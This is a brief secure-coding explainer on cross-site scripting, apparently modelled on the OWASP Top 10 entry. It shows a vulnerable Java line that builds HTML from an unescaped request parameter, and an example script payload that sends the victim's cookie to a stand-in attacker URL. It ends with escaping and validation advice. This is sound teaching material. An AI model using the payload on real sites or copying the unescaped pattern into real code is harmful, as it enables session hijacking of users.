Description

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser that can hijack user sessions, deface web sites, possibly introduce worms, etc..

Examples

The application uses un-trusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name= ’ creditcard ’ type= ’ TEXT ’ value=’ " + request.getParameter("CC") + "’ > " ;

The attacker modifies the ’CC’ parameter in their browser to:

’><script> document.location= ’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’.

This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

Mitigation

Preventing XSS requires keeping un-trusted data separate from active browser content.

  • The preferred option is to properly escape all un-trusted data (any user submitted data) based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them.
  • Positive or "whitelist" input validation with appropriate canonicalization and decoding is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input.